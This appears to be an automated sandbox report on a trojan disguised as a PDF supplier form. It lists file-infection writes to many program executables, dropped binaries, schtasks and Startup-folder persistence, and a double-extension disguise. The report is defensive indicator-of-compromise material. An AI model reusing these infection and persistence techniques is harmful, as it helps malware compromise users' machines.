Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Drops PE files
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\neworigin.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Install\{3007B876-EF79-48CC-9A41-17D9D214FFC1}\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.372\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\build.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\alg.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
